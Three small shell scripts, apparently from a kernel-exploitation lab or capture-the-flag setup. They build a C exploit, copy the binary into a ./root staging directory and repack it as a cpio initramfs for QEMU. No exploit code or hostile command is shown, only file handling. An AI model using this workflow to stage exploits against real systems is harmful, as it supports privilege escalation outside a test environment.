# Usage: ./copy_exploit.sh <exploit_binary>

if [ $# -eq 0 ]; then
  echo "Usage: $0 <exploit_binary>"
  exit 1
fi

# Quote the argument (paths may contain spaces) and propagate cp failures.
cp "$1" ./root/ || exit 1
      #!/bin/sh
# pack_rootfs.sh — repack the ./root staging directory into a newc cpio
# archive with root ownership, as expected by the QEMU initramfs.

# Abort if the staging directory is missing; otherwise cpio would silently
# pack the current directory instead.
cd root || exit 1
find . -print0 | cpio -o --format=newc --null --owner=root > ../rootfs_updated.cpio
      #!/bin/sh
# Build, copy and pack in one step.
# Usage: ./<this script> <source_file.c>

if [ $# -eq 0 ]; then
  echo "Usage: $0 <source_file.c>"
  exit 1
fi

SOURCE_FILE=$1
OUTPUT_FILE=$(dirname "$SOURCE_FILE")/$(basename "$SOURCE_FILE" .c)

# Stop at the first failing step instead of packing a stale/missing binary.
./build_exploit.sh "$SOURCE_FILE" || exit 1
./copy_exploit.sh "$OUTPUT_FILE" || exit 1
./pack_rootfs.sh

Reference